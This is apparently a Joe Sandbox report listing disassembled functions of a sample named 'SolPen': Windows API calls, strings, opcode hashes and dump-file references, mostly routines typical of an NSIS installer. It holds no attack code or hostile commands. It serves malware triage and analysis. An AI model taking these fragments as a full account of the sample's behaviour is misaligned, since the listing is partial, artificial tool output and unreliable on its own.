Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4

Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
RegCloseKey.ADVAPI32(?), ref: 004029E4

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
WriteReg: error creating key "%s\%s", xrefs: 004029F5

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: lstrlen$CloseCreateValuewvsprintf
String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
API String ID: 1641139501-220328614
Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59

Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
GlobalFree.KERNEL32(00000000), ref: 00402F17
CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
DeleteFileW.KERNEL32(?), ref: 00402F56

Strings

created uninstaller: %d, "%s", xrefs: 00402F3B

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not initialize OLE, xrefs: 004024F1
Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not load %s, xrefs: 004024DB

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-945480824
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: command="%s", xrefs: 00402241
Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: success ("%s"), xrefs: 00402263

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(0000CA00,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

%u.%u%s%s, xrefs: 00404444
@rD, xrefs: 00404402

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_SolPen.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000003.00000002.1417793706.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1417734177.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417818383.0000000000408000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000040B000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.000000000041F000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.0000000000461000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417839461.00000000004BB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000003.00000002.1417986743.00000000004F4000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

